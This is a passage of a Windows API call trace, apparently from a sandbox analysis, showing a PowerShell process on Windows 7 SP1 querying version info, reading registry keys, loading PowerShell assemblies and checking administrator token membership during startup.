lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc320, puLen=0x24dcf0) returned 1 [0057.127] lstrlenW (lpString="6.1.7601.17514") returned 14 [0057.127] CoTaskMemAlloc (cb=0x20) returned 0x15ec20 [0057.127] lstrcpyW (in: lpString1=0x15ec20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0057.127] CoTaskMemFree (pv=0x15ec20) [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc360, puLen=0x24dcf0) returned 1 [0057.127] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0057.127] CoTaskMemAlloc (cb=0x44) returned 0x89bf0 [0057.127] lstrcpyW (in: lpString1=0x89bf0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0057.127] CoTaskMemFree (pv=0x89bf0) [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc3c8, puLen=0x24dcf0) returned 1 [0057.128] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0057.128] CoTaskMemAlloc (cb=0x76) returned 0xe42e0 [0057.128] lstrcpyW (in: lpString1=0xe42e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0057.128] CoTaskMemFree (pv=0xe42e0) [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc464, puLen=0x24dcf0) returned 1 [0057.128] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0057.128] CoTaskMemAlloc (cb=0x44) returned 0x89bf0 [0057.128] lstrcpyW (in: lpString1=0x89bf0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0057.128] CoTaskMemFree (pv=0x89bf0) [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc4c8, puLen=0x24dcf0) returned 1 [0057.128] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0057.128] CoTaskMemAlloc (cb=0x58) returned 0xb1980 [0057.128] lstrcpyW (in: lpString1=0xb1980, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0057.128] CoTaskMemFree (pv=0xb1980) [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc544, puLen=0x24dcf0) returned 1 [0057.128] lstrlenW (lpString="6.1.7601.17514") returned 14 [0057.128] CoTaskMemAlloc (cb=0x20) returned 0x15ec20 [0057.128] lstrcpyW (in: lpString1=0x15ec20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0057.128] CoTaskMemFree (pv=0x15ec20) [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc1ec, puLen=0x24dcf0) returned 1 [0057.128] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0057.128] CoTaskMemAlloc (cb=0x66) returned 0x156fa0 [0057.128] lstrcpyW (in: lpString1=0x156fa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0057.128] CoTaskMemFree (pv=0x156fa0) [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0 [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0 [0057.128] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x0, puLen=0x24dcf0) returned 0 [0057.129] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dcc8, puLen=0x24dcc0 | out: lplpBuffer=0x24dcc8*=0x2dfc194, puLen=0x24dcc0) returned 1 [0057.129] CoTaskMemAlloc (cb=0x204) returned 0xe7050 [0057.129] VerLanguageNameW (in: wLang=0x0, szLang=0xe7050, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0057.129] CoTaskMemFree (pv=0xe7050) [0057.129] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\", lplpBuffer=0x24dd18, puLen=0x24dd10 | out: lplpBuffer=0x24dd18*=0x2dfc120, puLen=0x24dd10) returned 1 [0057.136] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0057.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.218] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbe8 | out: phkResult=0x24dbe8*=0x304) returned 0x0 [0057.220] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dbd8 | out: phkResult=0x24dbd8*=0x308) returned 0x0 [0057.220] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dc68 | out: phkResult=0x24dc68*=0x30c) returned 0x0 [0057.224] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dbac, lpData=0x0, lpcbData=0x24dba8*=0x0 | out: lpType=0x24dbac*=0x1, lpData=0x0, lpcbData=0x24dba8*=0x56) returned 0x0 [0057.225] CoTaskMemAlloc (cb=0x5a) returned 0x156f30 [0057.225] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24db7c, lpData=0x156f30, lpcbData=0x24db78*=0x56 | out: lpType=0x24db7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24db78*=0x56) returned 0x0 [0057.225] CoTaskMemFree (pv=0x156f30) [0057.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0057.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0057.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0057.280] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0057.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.281] CoTaskMemFree (pv=0xb3750) [0057.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0057.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0058.111] CoTaskMemAlloc (cb=0x104) returned 0x168710 [0058.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168710, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.111] CoTaskMemFree (pv=0x168710) [0058.111] CoTaskMemAlloc (cb=0x104) returned 0x168710 [0058.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x168710, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.111] CoTaskMemFree (pv=0x168710) [0058.221] CoTaskMemAlloc (cb=0x104) returned 0x16ab40 [0058.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16ab40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.221] CoTaskMemFree (pv=0x16ab40) [0058.223] CoTaskMemAlloc (cb=0x104) returned 0x16ab40 [0058.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16ab40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.223] CoTaskMemFree (pv=0x16ab40) [0058.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x16ab40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.223] CoTaskMemFree (pv=0x16ab40) [0058.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0058.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0058.450] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0058.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.450] CoTaskMemFree (pv=0xb3750) [0058.513] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0058.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0058.513] CoTaskMemFree (pv=0xb3750) [0058.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0058.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0059.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0059.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0059.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0059.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0059.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0059.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0059.790] CoTaskMemAlloc (cb=0x104) returned 0x1b962a10 [0059.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b962a10, nSize=0x80 | out: lpBuffer="") returned 0x0 [0059.790] CoTaskMemFree (pv=0x1b962a10) [0059.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0059.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0059.909] SetErrorMode (uMode=0x1) returned 0x1 [0059.909] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24db40 | out: lpFileInformation=0x24db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.909] SetErrorMode (uMode=0x1) returned 0x1 [0060.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.077] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.077] CoTaskMemFree (pv=0x1b96d2f0) [0060.081] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.082] CoTaskMemFree (pv=0x1b96d2f0) [0060.082] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.082] CoTaskMemFree (pv=0x1b96d2f0) [0060.097] CoCreateGuid (in: pguid=0x24df08 | out: pguid=0x24df08*(Data1=0x2411699e, Data2=0x81eb, Data3=0x4701, Data4=([0]=0x85, [1]=0x82, [2]=0xda, [3]=0x29, [4]=0xaf, [5]=0xdd, [6]=0xd7, [7]=0xb7))) returned 0x0 [0060.104] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.104] CoTaskMemFree (pv=0x1b96d2f0) [0060.107] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.107] CoTaskMemFree (pv=0x1b96d2f0) [0060.110] CoTaskMemAlloc (cb=0x104) returned 0x1b96d2f0 [0060.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d2f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0060.110] CoTaskMemFree (pv=0x1b96d2f0) [0060.117] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0060.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24dbb0 | out: lpConsoleScreenBufferInfo=0x24dbb0) returned 1 [0060.124] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0060.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24dbb0 | out: lpConsoleScreenBufferInfo=0x24dbb0) returned 1 [0060.126] GetVersionExW (in: lpVersionInformation=0x24db40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.128] GetCurrentProcess () returned 0xffffffffffffffff [0060.129] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24dbd8 | out: TokenHandle=0x24dbd8*=0x320) returned 1 [0060.133] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24daf8 | out: TokenInformation=0x0, ReturnLength=0x24daf8) returned 0 [0060.134] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb3ac0 [0060.134] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xb3ac0, TokenInformationLength=0x4, ReturnLength=0x24daf8 | out: TokenInformation=0xb3ac0, ReturnLength=0x24daf8) returned 1 [0060.135] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24dc58 | out: phNewToken=0x24dc58*=0x31c) returned 1 [0060.136] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24daf8 | out: TokenInformation=0x0, ReturnLength=0x24daf8) returned 0 [0060.136] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xb3af0, TokenInformationLength=0x4, ReturnLength=0x24daf8 | out: TokenInformation=0xb3af0, ReturnLength=0x24daf8) returned 1 [0060.137] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2ed6ea0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24dc68 | out: IsMember=0x24dc68) returned 1 [0060.137] CloseHandle (hObject=0x31c) returned 1 [0060.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0060.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: 